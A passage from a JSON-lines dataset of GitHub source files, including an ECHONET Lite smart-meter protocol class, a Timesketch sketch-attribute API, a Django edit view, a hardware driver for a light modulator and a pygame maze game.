overlap!\")\n\tresult = Interval(\"[0,1]\")\n\tif x.real_lower() < y.real_lower():\n\t\tresult.lower = x.lower\n\t\tresult.linclusive = x.linclusive\n\telse:\n\t\tresult.lower = y.lower\n\t\tresult.linclusive = y.linclusive\n\t\n\tif x.real_upper() > y.real_upper():\n\t\tresult.upper = x.upper\n\t\tresult.rinclusive = x.rinclusive\n\telse:\n\t\tresult.upper = y.upper\n\t\tresult.rinclusive = y.rinclusive\n\treturn result\n\ndef merge_overlapping(intervallist):\n\tintervallist.sort(key = lambda x:x.real_lower)\n\tresult = []\n\ttemp = intervallist[0]\n\tfor i in range(len(intervallist)-1):\n\t\ttry:\n\t\t\ttemp = merge_intervals(temp, intervallist[i+1])\n\t\texcept:\n\t\t\t#print \"break\"\n\t\t\tresult.append(temp)\n\t\t\ttemp = intervallist[i+1]\n\tresult.append(temp)\n\treturn result\n\n\ndef compare_intervals(x, y):\n\treturn x.real_lower() - y.real_lower()\n\n\ndef insert(ilist, newint):\n\tnewlist = ilist[:]\n\tfor interval in newlist:\n\t\tif newint.lower <= interval.lower:\n\t\t\tnewlist.insert(newlist.index(interval), newint)\n\t\t\tbreak\n\tif len(newlist) == len(ilist):\n\t\tnewlist.append(newint)\n\treturn newlist\n\n","repo_name":"fs1214/Programming-for-DS","sub_path":"assignment5/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13308451888","text":"import datetime\n\n\nclass EchonetLite:\n \"\"\"# ECHONET Lite クラス\"\"\"\n \n # ECHONETサービス(ESV)\n ESV_CODE = {\n 'seti': b'\\x60',\n 'setc': b'\\x61',\n 'get': b'\\x62',\n 'inf_req': b'\\x63',\n 'setget': b'\\x6e',\n 'set_res': b'\\x71',\n 'get_res': b'\\x72',\n 'inf': b'\\x73',\n 'infc': b'\\x74', \n 'infc_reg': b'\\x7a',\n 'setget_res': b'\\x7e',\n 'seti_sna': b'\\x50',\n 'setc_sna': b'\\x51',\n 'get_sna': b'\\x52',\n 'inf_sna': b'\\x53',\n 'setget_sna': b'\\x5e'}\n \n # クラスグループコード\n CLS_GRP_CODE = {\n 'sensor': b'\\x00', # センサ関連機器クラスグループ\n 'airconditioner': b'\\x01', # 空調関連機器クラスグループ\n 'housing': b'\\x02', # 住宅・設備関連機器クラスグループ\n 'cooking': b'\\x03', # 調理・家事関連機器クラスグループ\n 'health': b'\\x04', # 健康関連機器クラスグループ\n 'control': b'\\x05', # 管理・操作関連機器クラスグループ\n 'av': b'\\x06', # AV健康関連機器クラスグループ\n 'profile': b'\\x0e', # プロファイルクラスグループ\n 'user': b'\\x0f'} # ユーザ定義クラスグループ\n\n # 管理・操作関連機器クラスグループ クラスコード\n CLS_CONTROL_CODE = { \n 'switch': b'\\xfd',\n 'portable': b'\\xfe',\n 'controller': b'\\xff'}\n\n # 機器オブジェクトスーパークラス EPC\n EPC_DICT = {\n 'operation_status': b'\\x80',\n 'location': b'\\x81',\n 'version': b'\\x82',\n 'idn': b'\\x83',\n 'fault_status': b'\\x88',\n 'manufacturer_code': b'\\x8a',\n 'facility_code': b'\\x8b',\n 'product_code': b'\\x8c',\n 'production_no': b'\\x8d',\n 'production_date': b'\\x8e',\n 'current_time': b'\\x97',\n 'current_date': b'\\x98',\n 'chg_pty_map': b'\\x9d',\n 'set_pty_map': b'\\x9e',\n 'get_pty_map': b'\\x9f'}\n \n # ECHONET Lite 電文構成(フレームフォーマット)\n frame = {\n 'ehd': bytes(2), # ECHONET Lite電文ヘッダ1,2\n 'tid': bytes(2), # トランザクションID\n 'seoj': bytes(3), # 送信元ECHONET Liteオブジェクト指定\n 'deoj': bytes(3), # 相手先ECHONET Liteオブジェクト指定\n 'esv': bytes(1), # ECHONET Liteサービス\n 'opc': bytes(1), # 処理プロパティー数\n 'ptys': []} # プロパティ列\n \n def __init__(self):\n self.frame['ehd'] = b'\\x10\\x81'\n self.frame['tid'] = b'\\x00\\x00'\n self.frame['seoj'] = b'\\x00\\x00\\x00'\n self.frame['deoj'] = b'\\x00\\x00\\x00'\n self.frame['esv'] = b'\\x00'\n self.frame['opc'] = b'\\x00'\n\n def set_tid(self, num):\n \"\"\"TID設定\"\"\"\n \n self.frame['tid'] = num.to_bytes(2, 'big')\n \n def get_tid(self):\n \"\"\"TID取得\"\"\"\n \n return int.from_bytes(self.frame['tid'], 'big')\n\n def set_eoj(self, sel, eoj):\n \"\"\"SEOJ, DEOJ設定\"\"\"\n \n if sel.upper() == 'S':\n self.frame['seoj'] = eoj\n elif sel.upper() == 'D':\n self.frame['deoj'] = eoj\n else:\n raise ValueError(sel)\n \n def get_eoj(self, sel):\n \"\"\"SEOJ, DEOJ取得\"\"\"\n \n if sel.upper() == 'S':\n return self.frame['seoj']\n elif sel.upper() == 'D':\n return self.frame['deoj']\n else:\n raise ValueError(sel)\n \n def set_esv(self, esv):\n \"\"\"ESV設定\"\"\"\n \n self.frame['esv'] = esv\n \n def get_esv(self):\n \"\"\"ESV取得\"\"\"\n \n return self.frame['esv']\n \n def reset_property(self):\n \"\"\"プロパティ列を空にする\"\"\"\n \n self.frame['ptys'] = []\n self.frame['opc'] = b'\\x00'\n\n @staticmethod\n def make_property(epc, edt = b''):\n \"\"\"プロパティを作成(dict形式)\"\"\"\n \n return {'epc': epc, 'pdc': len(edt).to_bytes(1, 'big'), 'edt': edt}\n\n def set_property(self, epc, edt = b''):\n \"\"\"プロパティを追加する\"\"\"\n \n pty = self.make_property(epc, edt)\n self.frame['ptys'].append(pty)\n self.frame['opc'] = len(self.frame['ptys']).to_bytes(1, 'big')\n\n def get_property(self, n):\n \"\"\"n番目のプロパティを取得 (dict形式)\"\"\"\n \n return self.frame['ptys'][n]\n\n def get_serialized_property(self, n):\n \"\"\"n番目のプロパティを取得 (bytes形式)\"\"\"\n \n \n pty = self.get_property(n)\n return pty['epc'] + pty['pdc'] + pty['edt']\n\n def get_frame(self):\n 
\"\"\"ECHONET Lite電文を取得 (dict形式)\"\"\"\n \n return self.frame\n \n def get_serialized_frame(self):\n \"\"\"ECHONET Lite電文を取得 (bytes形式)\"\"\"\n \n res = self.frame['ehd'] + self.frame['tid'] + self.frame['seoj'] + self.frame['deoj'] + \\\n self.frame['esv'] + self.frame['opc']\n for i in range(len(self.frame['ptys'])):\n res += self.get_serialized_property(i)\n return res\n\n @staticmethod\n def is_frame(frame):\n \"\"\"ECHONET Lite電文かどうか判断\"\"\"\n \n return True if frame[0:2] == b'\\x10\\x81' else False \n\n def make_frame(self, tid, esv, ptys):\n \"\"\"TID, ESV及びプロパティからECHONET Lite電文を組み立てる\n ptys: [[epc1, edt1], [epc2, edt2], ....]\"\"\"\n \n self.set_tid(tid) \n self.frame['esv'] = esv\n self.reset_property()\n for pty in ptys:\n self.set_property(pty[0], pty[1])\n return self.get_serialized_frame()\n\n def change_tid_frame(self, tid, frame):\n \"\"\"ECHONET Lite 電文のTIDを変更\"\"\"\n\n self.set_tid(tid)\n new_frame = frame[0:2] + self.frame['tid'] + frame[4:len(frame)]\n return new_frame\n\n def make_get_frame_dict(self):\n \"\"\"ECV辞書'EPC_DICT'を元に,Get電文を一括作成する。\"\"\"\n \n frame_dict = {}\n for key in self.EPC_DICT.keys():\n frame = self.make_frame(0, self.ESV_CODE['get'], [[self.EPC_DICT[key], b'']])\n frame_dict.update({'get_'+key: frame})\n return frame_dict\n\n def make_set_frame_dict(self):\n \"\"\"ECV辞書'EPC_DICT'を元に,Set電文を一括作成する。\"\"\"\n \n frame_dict = {}\n for key in self.EPC_DICT.keys():\n frame = self.make_frame(0, self.ESV_CODE['setc'], [[self.EPC_DICT[key], b'']])\n frame_dict.update({'set_'+key: frame})\n return frame_dict\n\n def parse_frame(self, res):\n \"\"\"ECHONET Lite 電文パーサー\"\"\"\n \n bt_res = bytes.fromhex(res)\n if len(bt_res) < 12: # EHD1~OPC:12byte\n return False\n if not self.is_frame(bt_res):\n return False\n\n frame = {'ehd': bt_res[0:2],\n 'tid': int.from_bytes(bt_res[2:4], 'big'),\n 'seoj': bt_res[4:7], \n 'deoj': bt_res[7:10],\n 'esv': bt_res[10:11],\n 'opc': int.from_bytes(bt_res[11:12], 'big'),\n 'ptys': []}\n\n idx = 12\n try: # ECHONET Liteプロパティ\n for i in range(frame['opc']):\n pty = {'epc': bt_res[idx:idx + 1],\n 'pdc': int.from_bytes(bt_res[idx + 1:idx + 2], 'big')}\n pty['edt'] = bt_res[idx+2:idx+2+pty['pdc']]\n frame['ptys'].append(pty)\n idx += 2 + pty['pdc']\n except:\n return False # フォーマットエラー\n \n if len(bt_res) != idx:\n return False # フォーマットエラー\n\n return frame\n\n\nclass EchonetLiteSmartEnergyMeter(EchonetLite):\n \"\"\"ECHONET Lite スマート電力量メータクラス\"\"\"\n\n CLS_LVSM_CODE = b'\\x88' # クラスコード(低圧スマート電力量メータ)\n\n ## EPC\n LVSM_EPC_DICT = {\n 'operation_status': b'\\x80',\n 'epc_coefficient': b'\\xd3',\n 'digits': b'\\xd7',\n 'amount_energy_normal': b'\\xe0',\n 'unit_amount_energy': b'\\xe1',\n 'hist_amount_energy1_norm': b'\\xe2',\n 'amount_energy_rev': b'\\xe3',\n 'hist_amount_energy1_rev': b'\\xe4',\n 'day_hist_amount_energy1': b'\\xe5',\n 'instant_power': b'\\xe7',\n 'instant_current': b'\\xe8',\n 'recent_amount_energy_norm': b'\\xea',\n 'recent_amount_energy_rev': b'\\xeb',\n 'hist_amount_energy2': b'\\xec',\n 'day_hist_amount_energy2': b'\\xed'}\n\n def __init__(self):\n super().__init__()\n \n self.frame['seoj'] = self.CLS_GRP_CODE['control'] + self.CLS_CONTROL_CODE['controller'] + b'\\x01'\n self.frame['deoj'] = self.CLS_GRP_CODE['housing'] + self.CLS_LVSM_CODE + b'\\x01'\n self.frame['esv'] = self.ESV_CODE['get']\n self.frame['opc'] = '\\x01'\n\n self.EPC_DICT.update(self.LVSM_EPC_DICT) # スーパークラスと自クラスのEPCを連結\n self.GET_FRAME_DICT = self.make_get_frame_dict() # Get電文辞書��一括作成\n\n self.set_property(self.EPC_DICT['operation_status']) # 
仮のプロパティを設定\n\n @staticmethod\n def parse_datetime(dt_bytes):\n \"\"\"30分毎の計測値などに付随する日付&時間パーサー\n dt_bytes: bytes型日付&時間 YYYYMMDDhhmmss (7 byte)\n return: datetime.datetime型\"\"\"\n \n year = int.from_bytes(dt_bytes[0:2], 'big')\n month = int.from_bytes(dt_bytes[2:3], 'big')\n day = int.from_bytes(dt_bytes[3:4], 'big')\n hour = int.from_bytes(dt_bytes[4:5], 'big')\n minute = int.from_bytes(dt_bytes[5:6], 'big')\n second = int.from_bytes(dt_bytes[6:7], 'big')\n \n return datetime.datetime(year, month, day, hour, minute, second)\n","repo_name":"yawatajunk/Wi-SUN_EnergyMeter","sub_path":"echonet_lite.py","file_name":"echonet_lite.py","file_ext":"py","file_size_in_byte":10509,"program_lang":"python","lang":"ja","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
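The `frame` dict above documents the ECHONET Lite layout: EHD, TID, SEOJ, DEOJ, ESV, OPC, then one EPC/PDC/EDT triple per property. Hand-assembling the Get request for instantaneous power (EPC 0xE7) that `EchonetLiteSmartEnergyMeter` builds makes the layout concrete; every byte value below is taken from the record's own code tables:

```python
ehd  = b"\x10\x81"             # ECHONET Lite header (EHD1, EHD2)
tid  = (1).to_bytes(2, "big")  # transaction id
seoj = b"\x05\xff\x01"         # source: controller object, instance 1
deoj = b"\x02\x88\x01"         # destination: low-voltage smart meter, instance 1
esv  = b"\x62"                 # ESV: Get
opc  = b"\x01"                 # one property follows
epc  = b"\xe7"                 # EPC: instantaneous power
pdc  = b"\x00"                 # no EDT payload on a Get

frame = ehd + tid + seoj + deoj + esv + opc + epc + pdc
print(frame.hex())  # 1081000105ff010288016201e700
```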
+{"seq_id":"28585701798","text":"import csv\nfrom collections import Counter\nwith open (\"height-weight.csv\") as f:\n reader=csv.reader(f)\n file_data=list(reader)\nfile_data.pop(0)\nnew_data=[]\nfor i in range(len(file_data)):\n n_numb=file_data[i][1]\n new_data.append(float(n_numb))\ndata=Counter(new_data)\nmode_for_range={\n \"50-60\":0,\n \"60-70\":0,\n \"70-80\":0\n\n\n}\nfor height,occurance in data.items():\n if 50 < float(height) < 60:\n mode_for_range[\"50-60\"]+=occurance\n \n elif 60 < float(height) < 70:\n mode_for_range[\"60-70\"]+=occurance\n elif 70 < float(height) < 80:\n mode_for_range[\"70-80\"]+=occurance\nmoderange,modeoccurance=0,0\nfor range,occurance in mode_for_range.items():\n if occurance>modeoccurance:\n moderange,modeoccurance=[int(range.split(\"-\")[0]),int(range.split(\"-\")[1])],occurance\nmode=float((moderange[0]+ moderange[1])/2)\nprint(\"mode = \"+str(mode))","repo_name":"aryamangoenka/c-104","sub_path":"mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29441390795","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 15 19:54:41 2022\n\n@author: jlab\n\"\"\"\n\nimport serial\nimport numpy as np\nimport time\nimport clr, sys\nclr.AddReference(r'C:\\Program Files (x86)\\Cypress\\EZ-USB FX3 SDK\\1.3\\bin\\CyUSB')\nimport CyUSB\n\n\nclass GlvUSB:\n def __init__(self, dev_idx=0):\n device_list = CyUSB.USBDeviceList(CyUSB.CyConst.DEVICES_CYUSB.to_bytes(1, sys.byteorder))\n self.dev = device_list.get_Item(dev_idx)\n assert self.dev is not None\n self.dev.BulkOutEndPt.TimeOut = 1000\n self.msg_size = np.int32(4096)\n self.buf = bytearray(self.msg_size)\n \n def upload_pattern(self, buf):\n #assert len(pixvals) == 1088\n err = self.dev.BulkOutEndPt.XferData(buf, self.msg_size)\n return err\n \n \nclass HSBuddy:\n def __init__(self, comport, verbose=True):\n self.port = serial.Serial(comport, 115200, timeout=1)\n self.verbose = verbose\n self.glvusb = GlvUSB()\n \n def __del__(self):\n self.port.close()\n \n def write(self, cmd):\n self.port.flushInput()\n self.port.write(str.encode(cmd+'\\r'))\n \n def read_answer(self):\n out = self.port.read_until(b'\\r>')\n return out\n \n def poll(self, cmd):\n self.port.flushOutput()\n self.write(cmd)\n out = self.read_answer().decode(\"utf-8\").splitlines()\n out = '\\n'.join(out)\n if self.verbose: \n print(out)\n else:\n return out\n \n def status(self):\n return self.poll('STAT') \n \n def bootup(self):\n return self.poll('BOOTUP')\n \n def vddah(self):\n return self.poll('VDDAH 350')\n \n \n \n \nclass patterns:\n def calculate_pattern_from_position_def(wl,dx,dy,f,def_f,x0,y0):\n #y - first pass SLM, short axis\n #x - second pass SLM, long axis\n # dx, dy, f in um\n # wl wavelength in um\n # 0.01843 = lambda/pixel width\n thetax = np.arctan(dx/f);\n thetay = np.arctan(dy/f);\n defocusfactor = def_f;\n \n rdist_x = np.linspace((-272+x0)/272,(272+x0)/272,544)\n rdist_y = np.linspace((-272+y0)/272,(272+y0)/272,544)\n \n def_x = (defocusfactor*rdist_x**2)\n def_y = (defocusfactor*rdist_y**2)\n \n phi_x = np.empty(544)\n phi_y = np.empty(544)\n c = wl/25.5; #wavelength/pixel pitch in um\n \n if thetax == 0: \n Nx = 0\n phi_x [:] = def_x#%(2*np.pi);\n if thetay == 0:\n phi_y [:] = def_y#%(2*np.pi);\n Ny = 0\n else:\n Ny = c/(np.sin(thetay))\n phi_y = (np.linspace(0,2*np.pi*544/Ny,544)+def_y)#%(2*np.pi)\n \n else:\n Nx = c/(np.sin(thetax));\n phi_x = (np.linspace(0,2*np.pi*544/Nx,544)+def_x)#%(2*np.pi)\n if thetay == 0:\n phi_y [:] = def_y#%(2*np.pi);\n Ny = 0\n else:\n Ny = c/(np.sin(thetay))\n phi_y = (np.linspace(0,2*np.pi*544/Ny,544)+def_y)#%(2*np.pi)\n \n phi = np.concatenate([phi_y, phi_x]) \n return Ny,Nx,phi\n \n def calculate_pixvals(pattern, calib_f, calib_p, wl, maxpi): #f=690 p=4\n pattern = pattern%(2*np.pi)\n maxpi_wl = maxpi*(473/wl);\n pattern_adj = pattern+((maxpi_wl-2)*np.pi)/2\n pattern_adj[pattern_adj<0]= 0\n pattern_adj[pattern_adj>maxpi_wl*np.pi]= maxpi_wl*np.pi\n calib_fun = lambda x: calib_f*np.power(x,1/calib_p); \n pixvals = calib_fun(pattern_adj*(wl/473));\n return pixvals\n \n \n \n \n \n","repo_name":"danionella/RandomAccessSLM","sub_path":"slmRA_hardware.py","file_name":"slmRA_hardware.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41509150439","text":"import logging\n\nfrom flask import jsonify\nfrom flask import request\nfrom flask import abort\nfrom flask_restful import Resource\nfrom flask_login import login_required\nfrom flask_login import current_user\n\nfrom timesketch.api.v1 import resources\nfrom timesketch.api.v1 import utils\nfrom timesketch.lib import ontology as ontology_lib\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_OK\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_BAD_REQUEST\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_CREATED\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_FORBIDDEN\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_NOT_FOUND\nfrom timesketch.models import db_session\nfrom timesketch.models.sketch import Attribute\nfrom timesketch.models.sketch import AttributeValue\nfrom timesketch.models.sketch import Sketch\n\n\nlogger = logging.getLogger(\"timesketch.sketch_api\")\n\n\nclass AttributeResource(resources.ResourceMixin, Resource):\n \"\"\"Resource for sketch attributes.\"\"\"\n\n def _validate_form_entry(self, form, key_to_check):\n \"\"\"Check a form value and return an error string if applicable.\n\n Args:\n form (dict): the dict that keeps the form data.\n key_to_check (str): the key in the form data to check against.\n\n Returns:\n An empty string if there are no issues, otherwise an\n error string to use to abort.\n \"\"\"\n value = form.get(key_to_check)\n if not value:\n return \"Unable to save an attribute without a {0:s}.\".format(key_to_check)\n\n if not isinstance(value, str):\n return \"Unable to save an attribute without a {0:s}.\".format(key_to_check)\n\n return \"\"\n\n @login_required\n def get(self, sketch_id):\n \"\"\"Handles GET request to the resource.\n\n Returns:\n An analysis in JSON (instance of flask.wrappers.Response)\n \"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, \"No sketch found with this ID.\")\n\n if not sketch.has_permission(current_user, \"read\"):\n abort(\n HTTP_STATUS_CODE_FORBIDDEN, \"User does not have read access to sketch\"\n )\n\n return jsonify(utils.get_sketch_attributes(sketch))\n\n @login_required\n def post(self, sketch_id):\n \"\"\"Handles POST request to the resource.\n\n Returns:\n A HTTP 200 if the attribute is successfully added or modified.\n \"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, \"No sketch found with this ID.\")\n\n if not sketch.has_permission(current_user, \"write\"):\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"User does not have write permission on the sketch.\",\n )\n\n form = request.json\n if not form:\n form = request.data\n\n if not form:\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"Unable to add or modify an attribute from a \"\n \"sketch without any data submitted.\",\n )\n\n for check in [\"name\", \"ontology\"]:\n error_message = self._validate_form_entry(form, check)\n if error_message:\n return abort(HTTP_STATUS_CODE_BAD_REQUEST, error_message)\n\n name = form.get(\"name\")\n ontology = form.get(\"ontology\", \"text\")\n\n ontology_def = ontology_lib.ONTOLOGY\n ontology_dict = ontology_def.get(ontology, {})\n cast_as_string = ontology_dict.get(\"cast_as\", \"str\")\n\n values = form.get(\"values\")\n if not values:\n return abort(\n HTTP_STATUS_CODE_BAD_REQUEST, \"Missing values from the request.\"\n )\n\n if not isinstance(values, (list, tuple)):\n return abort(HTTP_STATUS_CODE_BAD_REQUEST, \"Values needs to be 
a list.\")\n\n value_strings = [\n ontology_lib.OntologyManager.encode_value(x, cast_as_string) for x in values\n ]\n\n if any([not isinstance(x, str) for x in value_strings]):\n return abort(\n HTTP_STATUS_CODE_BAD_REQUEST,\n \"All values needs to be stored as strings.\",\n )\n\n attribute = None\n message = \"\"\n update_attribute = False\n for attribute in sketch.attributes:\n if (attribute.name == name) and (attribute.ontology == ontology):\n message = \"Attribute Updated\"\n update_attribute = True\n break\n\n if update_attribute:\n _ = AttributeValue.query.filter_by(attribute=attribute).delete()\n else:\n attribute = Attribute(\n user=current_user, sketch=sketch, name=name, ontology=ontology\n )\n\n db_session.add(attribute)\n db_session.commit()\n\n for value in value_strings:\n attribute_value = AttributeValue(\n user=current_user, attribute=attribute, value=value\n )\n attribute.values.append(attribute_value)\n db_session.add(attribute_value)\n db_session.commit()\n\n db_session.add(attribute)\n db_session.commit()\n\n return_data = {\n \"name\": name,\n \"ontology\": ontology,\n \"cast_as\": cast_as_string,\n }\n response = None\n if message:\n return_data[\"action\"] = \"update\"\n response = jsonify(return_data)\n response.status_code = HTTP_STATUS_CODE_OK\n else:\n return_data[\"action\"] = \"create\"\n response = jsonify(return_data)\n response.status_code = HTTP_STATUS_CODE_CREATED\n\n return response\n\n @login_required\n def delete(self, sketch_id):\n \"\"\"Handles delete request to the resource.\n\n Returns:\n A HTTP response code.\n \"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, \"No sketch found with this ID.\")\n\n if not sketch.has_permission(current_user, \"write\"):\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"User does not have write permission on the sketch.\",\n )\n\n form = request.json\n if not form:\n form = request.data\n\n if not form:\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"Unable to remove an attribute from a \"\n \"sketch without any data submitted.\",\n )\n\n for check in [\"name\", \"ontology\"]:\n error_message = self._validate_form_entry(form, check)\n if error_message:\n return abort(HTTP_STATUS_CODE_BAD_REQUEST, error_message)\n\n name = form.get(\"name\")\n ontology = form.get(\"ontology\", \"text\")\n\n for attribute in sketch.attributes:\n if attribute.name != name:\n continue\n if attribute.ontology != ontology:\n continue\n\n for value in attribute.values:\n attribute.values.remove(value)\n sketch.attributes.remove(attribute)\n db_session.commit()\n\n return HTTP_STATUS_CODE_OK\n\n return abort(\n HTTP_STATUS_CODE_BAD_REQUEST,\n \"Unable to delete the attribute, couldn't find it.\",\n )\n","repo_name":"google/timesketch","sub_path":"timesketch/api/v1/resources/attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","stars":2388,"dataset":"github-code","pt":"91"}
+{"seq_id":"14813980407","text":"# coding=utf-8\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic.edit import UpdateView\n\nfrom modules.personnel_operation.models import QualityAssurance\nfrom modules.share_module.check_decorator import check_principal\nfrom modules.share_module.permissionMixin import class_view_decorator\n\n\n@class_view_decorator(login_required)\n@class_view_decorator(permission_required('personnel_operation.change_qualityassurance', raise_exception=True))\n@class_view_decorator(check_principal) # 校验是否负责该项目\nclass PersonnelUpdate(SuccessMessageMixin, UpdateView):\n\ttemplate_name = \"personnel_edit.html\"\n\tmodel = QualityAssurance\n\tsuccess_message = u\"%(problems_items)s 成功��改\"\n\tfields = [\n\t\t\"department\",\n\t\t\"project_id\",\n\t\t\"index_items\",\n\t\t\"problems_items\",\n\t\t\"problems_explain\",\n\t\t\"error_number\",\n\t\t\"provider\",\n\t\t\"error_date\",\n\t\t\"improve_time\",\n\t\t\"improve_status\",\n\t\t\"improve_date\",\n\t\t\"remark\",\n\t\t\"remark1\",\n\t\t\"remark2\",\n\t\t\"remark3\"\n\t]\n\n\tdef get_success_url(self):\n\t\tself.url = reverse('personnel_info:personnel_list', args=())\n\n\t\treferrer = self.request.POST.get(\"referrer\", \"\")\n\t\tif referrer:\n\t\t\tself.url = referrer\n\n\t\t_addanother = self.request.POST.get(\"_addanother\", \"\")\n\t\tif _addanother:\n\t\t\tself.url = reverse('personnel_info:personnel_add')\n\t\treturn self.url\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(PersonnelUpdate, self).get_context_data(**kwargs)\n\t\tcontext[\"form_content\"] = u\"修改个人操作质量\"\n\t\treferrer = self.request.META.get('HTTP_REFERER', \"\")\n\t\tcontext[\"referrer\"] = referre\n\t\treturn context\n","repo_name":"xuhuiliang-maybe/ace_office","sub_path":"modules/personnel_operation/code/personnel_edit.py","file_name":"personnel_edit.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10756801273","text":"from Gera_labirinto_automatico import Gera_labirinto_automatico\r\nfrom Gera_labirinto_manual import Gera_labirinto_manual\r\nfrom Estado import Estado\r\nfrom Gabarito import Gabarito\r\nimport pygame\r\nfrom pygame import mixer\r\n\r\n\r\nspeed = 25\r\nclass interface:\r\n def __init__(self,matriz):\r\n self.altura = matriz.altura\r\n self.largura = matriz.largura\r\n self.matriz = matriz.matriz\r\n self.ponto_Inicial = matriz.ponto_Inicial\r\n self.ponto_Final = matriz.ponto_Final\r\n self.x = matriz.ponto_Inicial.x*25\r\n self.y = matriz.ponto_Inicial.y*25\r\n pygame.init()\r\n self.screen = pygame.display.set_mode((self.largura*25,self.altura*25))\r\n pygame.display.set_caption(\"Labirinto\")\r\n\r\n def game_map(self, instrucao):\r\n \r\n #caminho\r\n caminho = pygame.image.load('chaoClaro.png').convert_alpha()\r\n\r\n #parede\r\n parede = pygame.image.load('parede.png').convert_alpha()\r\n #tracante\r\n chaoEscuro = pygame.image.load('chaoEscuro.png').convert_alpha()\r\n #casa\r\n casa = pygame.image.load('casa.png').convert_alpha()\r\n\r\n pygame.font.init() #instruções\r\n font_instrucoes2 = pygame.font.SysFont('Stencil', 18)\r\n aviso = font_instrucoes2.render(instrucao, 1, (0, 0, 0))\r\n\r\n for y, row in enumerate(self.matriz):\r\n for x, cell in enumerate(row):\r\n if cell == 0:\r\n image = parede\r\n elif cell == 1:\r\n image = caminho\r\n else:\r\n image = chaoEscuro\r\n self.screen.blit(image, [x*25, y*25])\r\n self.screen.blit(casa, [self.ponto_Final.x*25, self.ponto_Final.y*25]) \r\n self.screen.blit(aviso, (self.largura*12.5-260, self.altura*25 - 22)) \r\n pygame.display.update() \r\n\r\n\r\n def player(self):\r\n player = pygame.image.load('raffChao.png').convert_alpha()\r\n self.screen.blit(player, [self.x, self.y]) \r\n\r\n def automatico(self,resposta): ####mudar\r\n\r\n loop = True\r\n i = 0\r\n instrucao = ' RESOLUÇÂO REALIZADA DE FORMA AUTOMÁTICA'\r\n while loop:\r\n pygame.time.delay(100)\r\n \r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n loop = False\r\n \r\n row = self.y // 25\r\n column = self.x // 25\r\n \r\n if self.matriz[row][column] == 1:\r\n self.matriz[row][column] = 2\r\n pos = self.x, self.y\r\n\r\n if resposta[i]=='left':\r\n self.x -= speed\r\n if resposta[i]=='right':\r\n self.x += speed\r\n if resposta[i]=='up':\r\n self.y -= speed\r\n if resposta[i]=='down':\r\n self.y += speed\r\n\r\n pygame.time.delay(300)\r\n i+=1\r\n row = self.y // 25\r\n column = self.x // 25\r\n if self.matriz[row][column] == 0:\r\n self.x, self.y = pos\r\n\r\n self.screen.fill((255,255,255))\r\n interface.game_map(self, instrucao)\r\n interface.player(self)\r\n pygame.display.update()\r\n \r\n if row == self.ponto_Final.y and column == self.ponto_Final.x:\r\n loop = False\r\n\r\n pygame.quit()\r\n\r\n def manual(self):\r\n loop = True\r\n Retorno = False\r\n instrucao = 'TECLE NAS (SETAS) PARA CHEGAR NO ICOMP (BLOCO CINZA)'\r\n movimentos = 0\r\n\r\n while loop:\r\n pygame.time.delay(100)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n loop = False\r\n movimentos = 0\r\n\r\n #player controls\r\n keys = pygame.key.get_pressed()\r\n \r\n pos = self.x, self.y\r\n\r\n row = self.y // 25\r\n column = self.x // 25\r\n if self.matriz[row][column] == 1:\r\n self.matriz[row][column] = 2\r\n\r\n if keys[pygame.K_LEFT]:\r\n self.x -= speed\r\n movimentos += 1\r\n if keys[pygame.K_RIGHT]:\r\n self.x += speed\r\n movimentos += 1\r\n if keys[pygame.K_UP]:\r\n self.y -= speed\r\n movimentos 
+= 1\r\n if keys[pygame.K_DOWN]:\r\n self.y += speed\r\n movimentos += 1\r\n \r\n row = self.y // 25\r\n column = self.x // 25\r\n if self.matriz[row][column] == 0:\r\n self.x, self.y = pos\r\n movimentos -=1\r\n\r\n self.screen.fill((255,255,255))\r\n interface.game_map(self, instrucao)\r\n interface.player(self, )\r\n pygame.display.update()\r\n\r\n if row == self.ponto_Final.y and column == self.ponto_Final.x:\r\n loop = False\r\n Retorno = True\r\n\r\n pygame.quit()\r\n return Retorno, movimentos\r\n\r\n def to_execute_Manual(self):\r\n return self.manual()\r\n \r\n def to_execute_Automatico(self):\r\n estadoInicial = Estado(self.matriz,self.ponto_Inicial,self.ponto_Final,0, [])\r\n resposta = Gabarito.caminho_ate_Fim(estadoInicial)\r\n print(resposta)\r\n if (resposta == []):\r\n pygame.quit()\r\n return True, len(resposta)\r\n else:\r\n self.automatico(resposta)\r\n return False, len(resposta)\r\n\r\n#mat 